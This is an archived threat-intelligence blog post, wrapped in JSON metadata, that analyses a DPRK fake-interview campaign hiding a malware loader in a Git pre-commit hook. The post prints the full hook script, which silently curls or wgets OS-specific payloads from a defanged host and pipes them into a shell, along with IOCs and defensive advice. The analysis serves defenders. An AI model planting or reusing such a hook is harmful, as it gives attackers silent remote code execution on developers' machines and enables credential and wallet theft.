{
	"id": "555200a1-e25b-4658-a024-3b1498d79c0c",
	"created_at": "2026-05-07T02:43:11.129017Z",
	"updated_at": "2026-05-07T02:44:10.984388Z",
	"deleted_at": null,
	"sha1_hash": "de0c52145ad53f6236c980ebee12b0b8427104ca",
	"title": "Lazarus Group Uses Git Hooks To Hide Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 341875,
	"plain_text": "Lazarus Group Uses Git Hooks To Hide Malware\r\nBy OpenSourceMalware.com\r\nPublished: 2026-05-06 · Archived: 2026-05-07 02:23:59 UTC\r\nThe OpenSourceMalware team has spotted a fresh twist in the DPRK's Contagious Interview / TaskJacker\r\nplaybook: the operators have pivoted away from stuffing their stage-2 loader into .vscode/tasks.json ,\r\npackage.json postinstall scripts, or fake .woff2 font files, and are now hiding it inside Git hooks. The\r\ncandidate clones the \"coding assessment\" repo, and the loader fires before the commit object is even written.\r\nWhat the hook actually does\r\nThe malicious .githooks/pre-commit script is short, which is the whole point — it's a thin loader that\r\nfingerprints the OS via uname -s , then curls or wgets a per-platform payload from precommit.vercel.app and\r\npipes it straight into a shell or cmd.exe :\r\n#!/bin/sh\r\nuname_s=\"$(uname -s 2\u003e/dev/null || echo unknown)\"\r\ncase \"$uname_s\" in\r\n Darwin)\r\n curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n Linux)\r\nhttps://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nPage 1 of 4\n\nwget -qO- 'hxxps://precommit[.]vercel.app/settings/linux?flag=5' | sh \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n MINGW*|MSYS*|CYGWIN*)\r\n curl -s hxxps://precommit[.]vercel.app/settings/windows?flag=5 | cmd \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n *)\r\n exit 0\r\n ;;\r\nesac\r\nA few things stand out. In typical DPRK fashion the C2 endpoint serves a different shell script per OS, so the\r\noperator can ship a Bash payload to macOS/Linux victims and a cmd.exe -compatible batch payload to anyone\r\non Git Bash / MSYS / Cygwin on Windows. The flag=5 query param is almost certainly a campaign/variant\r\nidentifier — we've seen Contagious Interview operators use similar numeric flags across earlier sub-campaigns to\r\ntrack which lure delivered the click. Output is silently discarded with \u003e/dev/null 2\u003e\u00261 , and the script always\r\nexits 0 so the commit succeeds and nothing looks broken to the developer.\r\nThe hostname precommit[.]vercel.app is the social-engineering layer. To anyone glancing at it, it reads like the\r\nofficial pre-commit framework's marketing site. It is not. It's a free Vercel deployment standing up a per-path\r\npayload server that the operators can spin up and tear down at will.\r\nWhy pre-commit hooks?\r\nPre-commit hooks are an almost ideal stage-2 trigger for this campaign:\r\nThey're already part of the legitimate developer workflow — Husky, lint-staged, and pre-commit\r\nframework configs are everywhere, so a .githooks/ directory raises zero suspicion.\r\nThey run automatically the first time the candidate tries to \"fix the bug and commit\" — which is literally\r\nthe task the fake recruiter assigned them.\r\nMost candidates who clone an interview repo will configure hooks via git config core.hooksPath\r\n.githooks (or have it set in a setup script) without reading what's inside.\r\nThey sidestep VS Code entirely. Microsoft has finally started taking the tasks.json auto-execute\r\nproblem seriously, and operators are clearly looking for the next dev-tool footgun.\r\nIt's the same Contagious Interview social engineering — fake recruiter, \"coding assessment\" repo, multi-stage\r\nloader pulling InvisibleFerret-style implants for crypto wallet and credential theft — just delivered through a\r\ndifferent live wire.\r\nWhat we're seeing\r\nAcross the sample we pulled today, the same pre-commit hook (identical content, identical SHA 3ebd9bb… ) was\r\ncommitted to several GitHub repositories that follow the standard Contagious Interview lure pattern: defi/crypto-token themed projects, freshly-created accounts, minimal commit history, and a \"task\" that requires the candidate\r\nto actually run code locally. You can reproduce the hunt yourself with this GitHub code search: path:**/pre-commit OR path:**/post-checkout content:\"vercel.app\" . Additionally, the same threat actor group is using\r\npost-checkout hooks, which are even nastier as they will fire off any time you change branches.\r\nIf you're a developer being asked to clone a repo as part of an interview process — especially one in the crypto,\r\nDeFi, or web3 space — assume it's hostile until proven otherwise. Inspect .githooks/ , .husky/ ,\r\n.vscode/tasks.json , and any postinstall script before doing anything else. Better yet, run the whole thing\r\ninside a disposable VM with no browser profile, no ~/.ssh , and no wallet mounted.\r\nIndicators of Compromise (IOCs)\r\nC2 Infrastructure\r\nhxxps://precommit[.]vercel.app/settings/mac?flag=5\r\nhxxps://precommit[.]vercel.app/settings/linux?flag=5\r\nhxxps://precommit[.]vercel.app/settings/windows?flag=5\r\nprecommit[.]vercel.app\r\nFile Indicators\r\n.githooks/pre-commit\r\nSHA-256 of observed loader: 3ebd9bb57d155cc7c3353660f54c153a094cdfbd (git blob SHA, multiple repos)\r\nHunt Query (GitHub code search)\r\npath:**/pre-commit OR path:**/post-checkout content:\"vercel.app\"\r\nConclusion\r\nThis is the same DPRK actor, the same victim profile, the same end goal — they've just moved the trip-wire one\r\nstep earlier in the developer workflow. Expect the loader location to keep mutating: anywhere a developer's\r\ntooling runs an arbitrary script automatically, Contagious Interview will eventually hide a payload there.\r\nIf you encounter similar repos or pre-commit hooks reaching out to suspicious infrastructure, please report them to\r\nOpenSourceMalware.com.\r\nStay safe out there.\r\nTags: #dprk #contagious-interview #taskjacker #lazarus #supply-chain #github\r\nSource: https://opensourcemalware.com/blog/dprk-git-hooks-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://opensourcemalware.com/blog/dprk-git-hooks-malware"
	],
	"report_names": [
		"dprk-git-hooks-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1778121791,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.pdf",
		"text": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.txt",
		"img": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.jpg"
	}
}